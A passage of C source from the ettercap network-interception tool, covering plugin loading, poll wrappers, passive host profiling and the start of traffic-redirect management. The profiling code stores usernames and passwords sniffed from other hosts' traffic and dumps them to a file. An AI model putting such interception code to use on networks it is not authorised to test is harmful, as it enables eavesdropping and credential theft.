n = scandir(where, &namelist, plugin_filter, alphasort); DEBUG_MSG("plugin_loadall: %d found", n); } for(i = n-1; i >= 0; i--) { ret = plugin_load_single(where, namelist[i]->d_name); switch (ret) { case E_SUCCESS: t++; break; case -E_DUPLICATE: USER_MSG("plugin %s already loaded...\n", namelist[i]->d_name); DEBUG_MSG("plugin %s already loaded...", namelist[i]->d_name); break; case -E_VERSION: USER_MSG("plugin %s was compiled for a different ettercap version...\n", namelist[i]->d_name); DEBUG_MSG("plugin %s was compiled for a different ettercap version...", namelist[i]->d_name); break; case -E_INVALID: default: USER_MSG("plugin %s cannot be loaded...\n", namelist[i]->d_name); DEBUG_MSG("plugin %s cannot be loaded...", namelist[i]->d_name); break; } SAFE_FREE(namelist[i]); } USER_MSG("%4d plugins\n", t); SAFE_FREE(namelist); atexit(plugin_unload_all); #else USER_MSG(" 0 plugins (disabled by configure...)\n"); #endif } /* * unload all the plugin */ void plugin_unload_all(void) { #ifdef HAVE_PLUGINS struct plugin_entry *p; DEBUG_MSG("ATEXIT: plugin_unload_all"); while (SLIST_FIRST(&plugin_head) != NULL) { p = SLIST_FIRST(&plugin_head); if(plugin_is_activated(p->ops->name) == 1) plugin_fini(p->ops->name); dlclose(p->handle); SLIST_REMOVE_HEAD(&plugin_head, next); SAFE_FREE(p); } #endif } /* * function used by plugins to register themself */ int plugin_register(void *handle, struct plugin_ops *ops) { #ifdef HAVE_PLUGINS struct plugin_entry *p, *pl; /* check for ettercap API version */ if (strcmp(ops->ettercap_version, EC_VERSION)) { dlclose(handle); return -E_VERSION; } /* check that this plugin was not already loaded */ SLIST_FOREACH(pl, &plugin_head, next) { /* same name and same version */ if (!strcmp(ops->name, pl->ops->name) && !strcmp(ops->version, pl->ops->version)) { dlclose(handle); return -E_DUPLICATE; } } SAFE_CALLOC(p, 1, sizeof(struct plugin_entry)); p->handle = handle; p->ops = ops; SLIST_INSERT_HEAD(&plugin_head, p, next); return E_SUCCESS; #else (void) handle; (void) ops; return -E_INVALID; #endif } /* * activate a plugin. * it launch the plugin init function */ int plugin_init(char *name) { struct plugin_entry *p; int ret; SLIST_FOREACH(p, &plugin_head, next) { if (!strcmp(p->ops->name, name)) { /* get the response from the plugin */ ret = p->ops->init(NULL); /* if it is still running, mark it as active */ if (ret == PLUGIN_RUNNING) p->activated = 1; return ret; } } return -E_NOTFOUND; } /* * deactivate a plugin. * it launch the plugin fini function */ int plugin_fini(char *name) { struct plugin_entry *p; int ret; SLIST_FOREACH(p, &plugin_head, next) { if (p->activated == 1 && !strcmp(p->ops->name, name)) { /* get the response from the plugin */ ret = p->ops->fini(NULL); /* if it is still running, mark it as active */ if (ret == PLUGIN_FINISHED) p->activated = 0; return ret; } } return -E_NOTFOUND; } /* * self-destruct a plugin thread. * it resets the activity state and destructs itself by calling the plugin fini function. * it does not replace the _fini standard function rather than it depends on it. * this function does not do anything if not executed by a thread. */ int plugin_kill_thread(char *name, char *thread) { struct plugin_entry *p; int ret; pthread_t pid; pid = ec_thread_getpid(thread); /* do not execute if not being a thread */ if (pthread_equal(pid, ec_thread_getpid(NULL))) return -E_INVALID; /* the thread can only kill itself */ if (!pthread_equal(pid, pthread_self())) return -E_INVALID; DEBUG_MSG("plugin_kill_thread"); KILL_LOCK; SLIST_FOREACH(p, &plugin_head, next) { if (p->activated == 1 && !strcmp(p->ops->name, name)) { /* flag plugin as inactive */ p->activated = 0; /* update the UI */ ui_update(UI_UPDATE_PLUGINLIST); /* release the lock */ KILL_UNLOCK; /* call plugin's destruction routine */ ret = p->ops->fini(NULL); /* * normally the thread should not return from the call - * just in case the thread wasn't destroyed in the fini callback * destroy it here */ ec_thread_destroy(pid); /* should never be reached */ return ret; } } KILL_UNLOCK; return -E_NOTFOUND; } /* * it print the list of the plugins. * * func is the callback function to which are passed * - the plugin name * - the plugin version * - the plugin description * * min is the n-th plugin to start to print * max it the n-th plugin to stop to print */ int plugin_list_walk(int min, int max, void (*func)(char, struct plugin_ops *)) { struct plugin_entry *p; int i = min; SLIST_FOREACH(p, &plugin_head, next) { if (i > max) return (i-1); if (i < min) { i++; continue; } func(p->activated, p->ops); i++; } return (i == min) ? -E_NOTFOUND : (i-1); } /* * returns the activation flag */ int plugin_is_activated(char *name) { struct plugin_entry *p; SLIST_FOREACH(p, &plugin_head, next) { if (!strcmp(p->ops->name, name)) { return p->activated; } } return 0; } /* * search if a plugin exists */ int search_plugin(char *name) { struct plugin_entry *p; SLIST_FOREACH(p, &plugin_head, next) { if (!strcmp(p->ops->name, name)) { return E_SUCCESS; } } return -E_NOTFOUND; } /* * print the list of available plugins */ void plugin_list(void) { int ret; DEBUG_MSG("plugin_list"); /* load all the plugins */ plugin_load_all(); /* print the list */ fprintf(stdout, "\nAvailable plugins :\n\n"); ret = plugin_list_walk(PLP_MIN, PLP_MAX, &plugin_print); if (ret == -E_NOTFOUND) { fprintf(stdout, "No plugin found !\n\n"); return; } fprintf(stdout, "\n\n"); } /* * walk through the list of plugin names and free */ void free_plugin_list(struct plugin_list_t plugins) { struct plugin_list *plugin, *tmp; PLUGIN_LIST_LOCK; LIST_FOREACH_SAFE(plugin, &plugins, next, tmp) { LIST_REMOVE(plugin, next); SAFE_FREE(plugin->name); SAFE_FREE(plugin); } PLUGIN_LIST_UNLOCK; } /* * callback function for displaying the plugin list */ static void plugin_print(char active, struct plugin_ops *ops) { /* variable not used */ (void) active; fprintf(stdout, " %15s %4s %s\n", ops->name, ops->version, ops->info); } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/ec_poll.c000664 000000 000000 00000006601 13711276346 016035 0ustar00rootroot000000 000000 /* ettercap -- poll events (use poll or select) Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #ifdef HAVE_SYS_POLL_H #include #elif defined (HAVE_POLL_H) #include #endif #ifdef HAVE_SYS_SELECT_H #include #endif /* protos */ int ec_poll_in(int fd, u_int msec); int ec_poll_out(int fd, u_int msec); int ec_poll_buffer(char *buf); /************************************************/ /* * looks for event on INPUT */ int ec_poll_in(int fd, u_int msec) { #if defined(HAVE_POLL) && !defined(OS_DARWIN) int poll_result; struct pollfd poll_fd; /* set the correct fd */ poll_fd.fd = fd; poll_fd.events = POLLIN; /* execute the syscall */ poll_result = poll(&poll_fd, 1, msec); /* the event has occurred, return 1 */ if (poll_result > 0 && poll_fd.revents & POLLIN) return 1; return 0; #elif defined(HAVE_SELECT) fd_set msk_fd; struct timeval to; memset(&to, 0, sizeof(struct timeval)); /* timeval uses microseconds */ to.tv_usec = MILLI2MICRO(msec); FD_ZERO(&msk_fd); /* set the correct fd */ FD_SET(fd, &msk_fd); /* execute the syscall */ int fds = select(FOPEN_MAX, &msk_fd, (fd_set *) 0, (fd_set *) 0, &to); if (fds <= 0) { return 0; } /* the even has occurred */ if (FD_ISSET(0, &msk_fd)) return 1; return 0; #else #error "you don't have neither poll nor select" #endif } /* * looks for event on OUTPUT */ int ec_poll_out(int fd, u_int msec) { #if defined(HAVE_POLL) && !defined(OS_DARWIN) struct pollfd poll_fd; /* set the correct fd */ poll_fd.fd = fd; poll_fd.events = POLLOUT; /* execute the syscall */ poll(&poll_fd, 1, msec); /* the event has occurred, return 1 */ if (poll_fd.revents & POLLOUT) return 1; return 0; #elif defined(HAVE_SELECT) fd_set msk_fd; struct timeval to; memset(&to, 0, sizeof(struct timeval)); /* timeval uses microseconds */ to.tv_usec = MILLI2MICRO(msec); FD_ZERO(&msk_fd); /* set the correct fd */ FD_SET(fd, &msk_fd); /* execute the syscall */ int fds = select(FOPEN_MAX, (fd_set *) 0, &msk_fd, (fd_set *) 0, &to); if (fds <=0) return 0; /* the even has occurred */ if (FD_ISSET(0, &msk_fd)) return 1; return 0; #else #error "you don't have neither poll nor select" #endif } /* * a fake poll implementation on string buffers * it returns != 0 if there are char(s) to read, * 0 if the first char is null */ int ec_poll_buffer(char *buf) { if (buf) return *buf; else return 0; } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/ec_profiles.c000664 000000 000000 00000052453 13711276346 016720 0ustar00rootroot000000 000000 /* ettercap -- host profiling module Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include #include #include #include #include #include #include #define ONLY_REMOTE_PROFILES 3 #define ONLY_LOCAL_PROFILES 2 /* protos */ void __init profiles_init(void); static void profile_purge(int flag); static int profile_add_host(struct packet_object *po); static int profile_add_user(struct packet_object *po); static void update_info(struct host_profile *h, struct packet_object *po); static void update_port_list(struct host_profile *h, struct packet_object *po); static void update_port_list_with_advertised(struct host_profile *h, uint8_t L4_proto, uint16_t L4_src); static void set_gateway(u_char *L2_addr); /* global mutex on interface */ static pthread_mutex_t profile_mutex = PTHREAD_MUTEX_INITIALIZER; #define PROFILE_LOCK do { pthread_mutex_lock(&profile_mutex); } while(0) #define PROFILE_UNLOCK do { pthread_mutex_unlock(&profile_mutex); } while(0) /************************************************/ /* * add the hook function */ void __init profiles_init(void) { /* add the hook for the ARP packets */ hook_add(HOOK_PACKET_ARP, &profile_parse); /* add the hook for ICMP packets */ hook_add(HOOK_PACKET_ICMP, &profile_parse); /* add the hook for ICMPv6 packets */ hook_add(HOOK_PACKET_ICMP6, &profile_parse); /* add the hook for DHCP packets */ hook_add(HOOK_PROTO_DHCP_PROFILE, &profile_parse); /* receive all the top half packets */ hook_add(HOOK_DISPATCHER, &profile_parse); } /* * decides if the packet has to be added * to the profiles */ void profile_parse(struct packet_object *po) { /* we don't want profiles in memory. */ if (!EC_GBL_CONF->store_profiles) { return; } /* * skip packet sent (spoofed) by us * else we will get duplicated hosts with our mac address * this is necessary because check_forwarded() is executed * in ec_ip.c, but here we are getting even arp packets... */ EXECUTE(EC_GBL_SNIFF->check_forwarded, po); if (po->flags & PO_FORWARDED) return; /* * recheck if the packet is compliant with the visualization filters. * we need to redo the test, because here we are hooked to ARP and ICMP * packets that are before the test in ec_decode.c */ po->flags |= PO_IGNORE; EXECUTE(EC_GBL_SNIFF->interesting, po); if ( po->flags & PO_IGNORE ) return; /* * call the add function only if the packet * is interesting... * - ARP packets * - ICMP packets * - DNS packets that contain GW information (they use fake icmp po) */ if ( po->L3.proto == htons(LL_TYPE_ARP) || /* arp packets */ po->L4.proto == NL_TYPE_ICMP || /* icmp packets */ po->L4.proto == NL_TYPE_ICMP6 ) profile_add_host(po); /* * we don't want to log conversations, only * open ports, OSes etc etc ;) */ if ( is_open_port(po->L4.proto, po->L4.src, po->L4.flags) || /* src port is open */ strcmp(po->PASSIVE.fingerprint, "") || /* collected fingerprint */ po->DISSECTOR.banner || /* banner */ po->DISSECTOR.os ) profile_add_host(po); /* * usernames and passwords are to be bound to * destination host, not source. * do it here, search for the right host and add * the username to the right port. */ if ( po->DISSECTOR.user || /* user */ po->DISSECTOR.pass || /* pass */ po->DISSECTOR.info /* info */ ) profile_add_user(po); if ( po->DISSECTOR.advertised_port != 0 && po->DISSECTOR.advertised_proto != 0 ) profile_add_host(po); return; } /* * add the infos to the profiles tables * return the number of hosts added (1 if added, 0 if updated) */ static int profile_add_host(struct packet_object *po) { struct host_profile *h; struct host_profile *c; struct host_profile *last = NULL; char tmp[MAX_ASCII_ADDR_LEN]; /* * do not store profiles for hosts with ip == 0.0.0.0 * they are hosts requesting for a dhcp/bootp reply. * they will get an ip address soon and we are interested * only in the latter. */ if (ip_addr_is_zero(&po->L3.src)) return 0; /* We don't need a profile on ourselves, do we? */ if(!memcmp(&po->L2.src, &EC_GBL_IFACE->mac, MEDIA_ADDR_LEN) || !memcmp(&po->L2.src, &EC_GBL_BRIDGE->mac, MEDIA_ADDR_LEN)) return 0; /* * if the type is FP_HOST_NONLOCAL * search for the GW and mark it */ if (po->PASSIVE.flags & FP_HOST_NONLOCAL) { set_gateway(po->L2.src); /* the mac address of non local should not be saved */ memset(&po->L2.src, 0, MEDIA_ADDR_LEN); } PROFILE_LOCK; /* search if it already exists */ TAILQ_FOREACH(h, &EC_GBL_PROFILES, next) { /* an host is identified by the mac and the ip address */ /* if the mac address is null also update it since it could * be captured as a DHCP packet specifying the GW */ if ((!memcmp(h->L2_addr, po->L2.src, MEDIA_ADDR_LEN) || !memcmp(po->L2.src, "\x00\x00\x00\x00\x00\x00", MEDIA_ADDR_LEN) ) && !ip_addr_cmp(&h->L3_addr, &po->L3.src) ) { update_info(h, po); /* the host was already in the list * return 0 host added */ PROFILE_UNLOCK; return 0; } } PROFILE_UNLOCK; DEBUG_MSG("profile_add_host %s", ip_addr_ntoa(&po->L3.src, tmp)); /* * the host was not found, create a new entry * before the creation check if it has to be stored... */ /* this is a local and we want only remote */ if ((po->PASSIVE.flags & FP_HOST_LOCAL) && (EC_GBL_CONF->store_profiles == ONLY_REMOTE_PROFILES)) return 0; /* this is remote and we want only local */ if ((po->PASSIVE.flags & FP_HOST_NONLOCAL) && (EC_GBL_CONF->store_profiles == ONLY_LOCAL_PROFILES)) return 0; /* create the new host */ SAFE_CALLOC(h, 1, sizeof(struct host_profile)); PROFILE_LOCK; /* fill the structure with the collected infos */ update_info(h, po); /* search the right point to inser it (ordered ascending) */ TAILQ_FOREACH(c, &EC_GBL_PROFILES, next) { if ( ip_addr_cmp(&c->L3_addr, &h->L3_addr) > 0 ) break; last = c; } if (TAILQ_FIRST(&EC_GBL_PROFILES) == NULL) TAILQ_INSERT_HEAD(&EC_GBL_PROFILES, h, next); else if (c != NULL) TAILQ_INSERT_BEFORE(c, h, next); else TAILQ_INSERT_AFTER(&EC_GBL_PROFILES, last, h, next); PROFILE_UNLOCK; DEBUG_MSG("profile_add_host: ADDED"); return 1; } /* set the info in a host profile */ static void update_info(struct host_profile *h, struct packet_object *po) { /* if it is marked as the gateway or unkown, don't update */ if ( !(h->type & FP_GATEWAY) && !(h->type & FP_UNKNOWN) ) h->type = po->PASSIVE.flags; /* update the mac address only if local or unknown */ if (h->type & FP_HOST_LOCAL || h->type == FP_UNKNOWN) memcpy(h->L2_addr, po->L2.src, MEDIA_ADDR_LEN); /* the ip address */ memcpy(&h->L3_addr, &po->L3.src, sizeof(struct ip_addr)); /* the distance in HOP */ if (po->L3.ttl > 1) h->distance = TTL_PREDICTOR(po->L3.ttl) - po->L3.ttl + 1; else h->distance = po->L3.ttl; /* get the hostname */ host_iptoa(&po->L3.src, h->hostname); if (po->DISSECTOR.os && h->os == NULL) h->os = strdup(po->DISSECTOR.os); /* * update the fingerprint only if there isn't a previous one * or if the previous fingerprint was an ACK * fingerprint. SYN fingers are more reliable */ if (po->PASSIVE.fingerprint[FINGER_TCPFLAG] != '\0' && (h->fingerprint[FINGER_TCPFLAG] == '\0' || h->fingerprint[FINGER_TCPFLAG] == 'A') ) memcpy(h->fingerprint, po->PASSIVE.fingerprint, FINGER_LEN); /* add the open port */ update_port_list(h, po); if (po->DISSECTOR.advertised_proto != 0 && po->DISSECTOR.advertised_port != 0) update_port_list_with_advertised(h, po->DISSECTOR.advertised_proto, po->DISSECTOR.advertised_port); } /* * search the host with this L2_addr * and mark it as the GW */ static void set_gateway(u_char *L2_addr) { struct host_profile *h; /* skip null mac addresses */ if (!memcmp(L2_addr, "\x00\x00\x00\x00\x00\x00", MEDIA_ADDR_LEN)) return; PROFILE_LOCK; TAILQ_FOREACH(h, &EC_GBL_PROFILES, next) { if (!memcmp(h->L2_addr, L2_addr, MEDIA_ADDR_LEN) ) { h->type |= FP_GATEWAY; PROFILE_UNLOCK; return; } } PROFILE_UNLOCK; } /* * update the list of open ports */ static void update_port_list(struct host_profile *h, struct packet_object *po) { struct open_port *o; struct open_port *p; struct open_port *last = NULL; /* search for an existing port */ LIST_FOREACH(o, &(h->open_ports_head), next) { if (o->L4_proto == po->L4.proto && o->L4_addr == po->L4.src) { /* set the banner for the port */ if (o->banner == NULL && po->DISSECTOR.banner) o->banner = strdup(po->DISSECTOR.banner); /* already logged */ return; } } /* skip this port, the packet was logged for * another reason, not the open port */ if ( !is_open_port(po->L4.proto, po->L4.src, po->L4.flags) ) return; DEBUG_MSG("update_port_list"); /* create a new entry */ SAFE_CALLOC(o, 1, sizeof(struct open_port)); o->L4_proto = po->L4.proto; o->L4_addr = po->L4.src; /* search the right point to inser it (ordered ascending) */ LIST_FOREACH(p, &(h->open_ports_head), next) { if ( ntohs(p->L4_addr) > ntohs(o->L4_addr) ) break; last = p; } /* insert in the right position */ if (LIST_FIRST(&(h->open_ports_head)) == NULL) LIST_INSERT_HEAD(&(h->open_ports_head), o, next); else if (p != NULL) LIST_INSERT_BEFORE(p, o, next); else LIST_INSERT_AFTER(last, o, next); } static void update_port_list_with_advertised(struct host_profile *h, uint8_t L4_proto, uint16_t L4_src) { struct open_port *o; struct open_port *p; struct open_port *last = NULL; /* search for an existing port */ LIST_FOREACH(o, &(h->open_ports_head), next) { if (o->L4_proto == L4_proto && o->L4_addr == L4_src) { // already logged return; } } DEBUG_MSG("update_port_list_with_advertised"); /* create a new entry */ SAFE_CALLOC(o, 1, sizeof(struct open_port)); o->L4_proto = L4_proto; o->L4_addr = L4_src; /* search the right point to inser it (ordered ascending) */ LIST_FOREACH(p, &(h->open_ports_head), next) { if ( ntohs(p->L4_addr) > ntohs(o->L4_addr) ) break; last = p; } /* insert in the right position */ if (LIST_FIRST(&(h->open_ports_head)) == NULL) LIST_INSERT_HEAD(&(h->open_ports_head), o, next); else if (p != NULL) LIST_INSERT_BEFORE(p, o, next); else LIST_INSERT_AFTER(last, o, next); } /* * update the users list */ static int profile_add_user(struct packet_object *po) { struct host_profile *h; struct open_port *o = NULL; struct active_user *u; struct active_user *a; struct active_user *last = NULL; int found = 0; /* no info to update */ if (po->DISSECTOR.user == NULL || po->DISSECTOR.pass == NULL) return 0; DEBUG_MSG("profile_add_user"); PROFILE_LOCK; /* search the right port on the right host */ TAILQ_FOREACH(h, &EC_GBL_PROFILES, next) { /* right host */ if ( !ip_addr_cmp(&h->L3_addr, &po->L3.dst) ) { LIST_FOREACH(o, &(h->open_ports_head), next) { /* right port and proto */ if (o->L4_proto == po->L4.proto && o->L4_addr == po->L4.dst) { found = 1; break; } } } /* if already found, exit the loop */ if (found) break; } /* * the port was not found... possible ? * yes, but extremely rarely. * don't worry, we have lost this for now, * but the next time it will be captured. */ if (!found || o == NULL) { PROFILE_UNLOCK; return 0; } /* search if the user was already logged */ LIST_FOREACH(u, &(o->users_list_head), next) { if (!strcmp(u->user, po->DISSECTOR.user) && !strcmp(u->pass, po->DISSECTOR.pass) && !ip_addr_cmp(&u->client, &po->L3.src)) { PROFILE_UNLOCK; return 0; } } SAFE_CALLOC(u, 1, sizeof(struct active_user)); /* if there are infos copy it, else skip */ if (po->DISSECTOR.user && po->DISSECTOR.pass) { u->user = strdup(po->DISSECTOR.user); u->pass = strdup(po->DISSECTOR.pass); u->failed = po->DISSECTOR.failed; /* save the source of the connection */ memcpy(&u->client, &po->L3.src, sizeof(struct ip_addr)); } else { SAFE_FREE(u); PROFILE_UNLOCK; return 0; } if (po->DISSECTOR.info) u->info = strdup(po->DISSECTOR.info); /* search the right point to inser it (ordered alphabetically) */ LIST_FOREACH(a, &(o->users_list_head), next) { if ( strcmp(a->user, u->user) > 0 ) break; last = a; } /* insert in the right position */ if (LIST_FIRST(&(o->users_list_head)) == NULL) LIST_INSERT_HEAD(&(o->users_list_head), u, next); else if (a != NULL) LIST_INSERT_BEFORE(a, u, next); else LIST_INSERT_AFTER(last, u, next); PROFILE_UNLOCK; return 1; } /* * purge local hosts from the list */ void profile_purge_local(void) { DEBUG_MSG("profile_purge_local"); profile_purge(FP_HOST_LOCAL); return; } /* * purge local hosts from the list */ void profile_purge_remote(void) { DEBUG_MSG("profile_purge_remote"); profile_purge(FP_HOST_NONLOCAL); return; } /* * purge all the host list */ void profile_purge_all(void) { DEBUG_MSG("profile_purge_all"); profile_purge( FP_HOST_LOCAL | FP_HOST_NONLOCAL ); return; } /* * do the actual elimination */ static void profile_purge(int flags) { struct host_profile *h, *tmp_h = NULL; struct open_port *o, *tmp_o = NULL; struct active_user *u, *tmp_u = NULL; PROFILE_LOCK; TAILQ_FOREACH_SAFE(h, &EC_GBL_PROFILES, next, tmp_h) { /* the host matches the flags */ if (h->type & flags) { /* free all the alloc'd ports */ LIST_FOREACH_SAFE(o, &(h->open_ports_head), next, tmp_o) { SAFE_FREE(o->banner); LIST_FOREACH_SAFE(u, &(o->users_list_head), next, tmp_u) { /* free the current infos */ SAFE_FREE(u->user); SAFE_FREE(u->pass); SAFE_FREE(u->info); /* remove from the list */ LIST_REMOVE(u, next); SAFE_FREE(u); } LIST_REMOVE(o, next); SAFE_FREE(o); } SAFE_FREE(h->os); TAILQ_REMOVE(&EC_GBL_PROFILES, h, next); SAFE_FREE(h); } } PROFILE_UNLOCK; } /* * convert the LOCAL profiles into the hosts list * (created by the initial scan) * this is useful to start in silent mode and collect * the list in passive mode. */ int profile_convert_to_hostlist(void) { struct host_profile *h; int count = 0; /* first, delete the hosts list */ del_hosts_list(); /* now parse the profile list and create the hosts list */ PROFILE_LOCK; TAILQ_FOREACH(h, &EC_GBL_PROFILES, next) { /* add only local hosts */ if (h->type & FP_HOST_LOCAL) { /* the actual add */ add_host(&h->L3_addr, h->L2_addr, h->hostname); count++; } } PROFILE_UNLOCK; return count; } /* * fill the desc and return the next/prev element */ void * profile_print(int mode, void *list, char **desc, size_t len) { struct host_profile *h = (struct host_profile *)list; struct host_profile *hl; char tmp[MAX_ASCII_ADDR_LEN]; /* NULL is used to retrieve the first element */ if (list == NULL) return TAILQ_FIRST(&EC_GBL_PROFILES); /* the caller wants the description */ if (desc != NULL) { struct open_port *o; struct active_user *u; int found = 0; #ifdef HAVE_GEOIP size_t slen; #endif /* search at least one account */ LIST_FOREACH(o, &(h->open_ports_head), next) { LIST_FOREACH(u, &(o->users_list_head), next) { found = 1; } } ip_addr_ntoa(&h->L3_addr, tmp); snprintf(*desc, len, "%c %15s %s", (found) ? '*' : ' ', tmp, h->hostname); #ifdef HAVE_GEOIP /* determine current string length */ slen = strlen(*desc); /* check if enough space is available to append the GeoIP info */ if (len - slen > 14 && EC_GBL_CONF->geoip_support_enable) { snprintf(*desc + slen, len - slen, ", %s", geoip_country_by_ip(&h->L3_addr)); } #endif } /* return the next/prev/current to the caller */ switch (mode) { case -1: return TAILQ_PREV(h, gbl_ptail, next); break; case +1: return TAILQ_NEXT(h, next); break; case 0: /* if exists in the list, return it */ TAILQ_FOREACH(hl, &EC_GBL_PROFILES, next) { if (hl == h) return h; } /* else, return NULL */ return NULL; break; default: return list; break; } return NULL; } /* * dump the whole profile list into an eci file */ int profile_dump_to_file(char *filename) { struct log_fd fd; char eci[strlen(filename)+5]; struct host_profile *h; struct open_port *o; struct active_user *u; struct packet_object po; DEBUG_MSG("profile_dump_to_file: %s", filename); /* append the extension */ snprintf(eci, strlen(filename)+5, "%s.eci", filename); if (EC_GBL_OPTIONS->compress) fd.type = LOG_COMPRESSED; else fd.type = LOG_UNCOMPRESSED; /* open the file for dumping */ if (log_open(&fd, eci) != E_SUCCESS) return -E_FATAL; /* this is an INFO file */ log_write_header(&fd, LOG_INFO); /* now parse the profile list and dump to the file */ PROFILE_LOCK; TAILQ_FOREACH(h, &EC_GBL_PROFILES, next) { memset(&po, 0, sizeof(struct packet_object)); /* create the po for logging */ memcpy(&po.L2.src, h->L2_addr, MEDIA_ADDR_LEN); memcpy(&po.L3.src, &h->L3_addr, sizeof(struct ip_addr)); /* fake the distance by subtracting it from a power of 2 */ po.L3.ttl = 128 - h->distance + 1; po.PASSIVE.flags = h->type; memcpy(&po.PASSIVE.fingerprint, h->fingerprint, FINGER_LEN); /* log for each host */ log_write_info_arp_icmp(&fd, &po); /* log the info. needed to record the fingerprint. * the above function will not log it */ log_write_info(&fd, &po); LIST_FOREACH(o, &(h->open_ports_head), next) { memcpy(&po.L2.src, h->L2_addr, MEDIA_ADDR_LEN); memcpy(&po.L3.src, &h->L3_addr, sizeof(struct ip_addr)); memset(&po.PASSIVE.fingerprint, 0, FINGER_LEN); po.L4.src = o->L4_addr; /* put the fake syn+ack to impersonate an open port */ po.L4.flags = TH_SYN | TH_ACK; po.L4.proto = o->L4_proto; /* log the packet for the open port */ log_write_info(&fd, &po); po.DISSECTOR.banner = o->banner; /* log for the banner */ if (o->banner) log_write_info(&fd, &po); LIST_FOREACH(u, &(o->users_list_head), next) { memcpy(&po.L3.dst, &h->L3_addr, sizeof(struct ip_addr)); /* the source addr is the client address */ memcpy(&po.L3.src, &u->client, sizeof(struct ip_addr)); /* to exclude the open port check */ po.L4.flags = TH_PSH; po.L4.dst = o->L4_addr; po.L4.src = 0; po.DISSECTOR.user = u->user; po.DISSECTOR.pass = u->pass; po.DISSECTOR.info = u->info; po.DISSECTOR.failed = u->failed; /* log for each account: * the host must be on the dest */ log_write_info(&fd, &po); } } } PROFILE_UNLOCK; /* close the file */ log_close(&fd); return E_SUCCESS; } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/ec_redirect.c000664 000000 000000 00000035520 13711276346 016672 0ustar00rootroot000000 000000 /* ettercap -- manage traffic redirect Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #ifndef OS_WINDOWS #include #endif #if defined(OS_DARWIN) || defined(OS_BSD) #define IPFW_SET "20" #define IPV4_ANY "any" #define IPV6_ANY "any" #else #define IPV4_ANY "0.0.0.0/0" #define IPV6_ANY "::/0" #endif /* proto */ static int set_redir_command(ec_redir_proto_t proto, char *commands[]); static void register_redir_service(char *name, u_int16 from_port, u_int16 to_port); /* globals */ static LIST_HEAD (, redir_entry) redirect_entries; static SLIST_HEAD (, serv_entry) redirect_services; enum { EC_REDIR_COMMAND_INSERT, EC_REDIR_COMMAND_REMOVE }; /* * execute the script to add or remove the redirection */ int ec_redirect(ec_redir_act_t action, char *name, ec_redir_proto_t proto, const char *destination, u_int16 sport, u_int16 dport) { char asc_sport[16]; char asc_dport[16]; char asc_destination[MAX_ASCII_ADDR_LEN]; int ret_val = 0; char *param[4]; char *commands[2] = {NULL, NULL}; char *command = NULL; struct redir_entry *re, *tmp; char *str_dstnet = NULL; char *str_dstmask = NULL; char *str_tmp = NULL; u_char *binmask = NULL; /* undefined defaults to any */ switch (proto) { case EC_REDIR_PROTO_IPV4: if (destination == NULL) destination = "0.0.0.0/0"; break; case EC_REDIR_PROTO_IPV6: if (destination == NULL) destination = "::/0"; break; default: DEBUG_MSG("ec_redirect(): invalid address family given"); return -E_INVALID; } DEBUG_MSG("ec_redirect(\"%s\", \"%s\", %s, %s, %d, %d)", (action == EC_REDIR_ACTION_INSERT ? "insert" : "remove"), name, (proto == EC_REDIR_PROTO_IPV4 ? "IPv4" : "IPv6"), destination, sport, dport); /* check and set redirects commands from etter.conf */ set_redir_command(proto, commands); /* insert or remove commands */ switch (action) { case EC_REDIR_ACTION_INSERT: /* check if entry is already present */ LIST_FOREACH_SAFE(re, &redirect_entries, next, tmp) { if (proto == re->proto && !strcmp(destination, re->destination) && sport == re->from_port && dport == re->to_port) { DEBUG_MSG("ec_redirect(): redirect entry already present"); return -E_INVALID; } } /* get command and check if it's defined */ command = commands[EC_REDIR_COMMAND_INSERT]; if (command == NULL) { DEBUG_MSG("ec_redirect(): redirect insert command for %s desired " "but not set in etter.conf - skipping...", proto == EC_REDIR_PROTO_IPV4 ? "IPv4" : "IPv6"); return -E_NOTHANDLED; } /* allocate memory for redirect entry and parse input and set values */ SAFE_CALLOC(re, 1, sizeof(struct redir_entry)); re->name = strdup(name); re->proto = proto; re->destination = strdup(destination); re->from_port = sport; re->to_port = dport; re->orig_nport = htons(sport); /* parse destination specification */ str_tmp = strdup(destination); str_dstnet = ec_strtok(str_tmp, "/", &str_dstmask); if (str_dstnet != NULL) { /* convert network */ if (ip_addr_pton(str_dstnet, &re->dst_network) != E_SUCCESS) goto clean_abort; /* convert prefix length to netmask */ if (str_dstmask != NULL && strlen(str_dstmask)) { /* prefix length specified */ u_int32 dstmask; if ((dstmask = strtoul(str_dstmask, NULL, 10)) <= 128) { binmask = ec_plen_to_binary(ntohs(re->dst_network.addr_len), dstmask); ip_addr_init(&re->dst_netmask, ntohs(re->dst_network.addr_type), binmask); SAFE_FREE(binmask); SAFE_FREE(str_tmp); } else goto clean_abort; } else { /* no prefix length specified */ u_int32 dstmask; /* assume full (host) prefix length */ dstmask = ntohs(re->dst_network.addr_len) * 8; binmask = ec_plen_to_binary(ntohs(re->dst_network.addr_len), dstmask); ip_addr_init(&re->dst_netmask, ntohs(re->dst_network.addr_type), binmask); 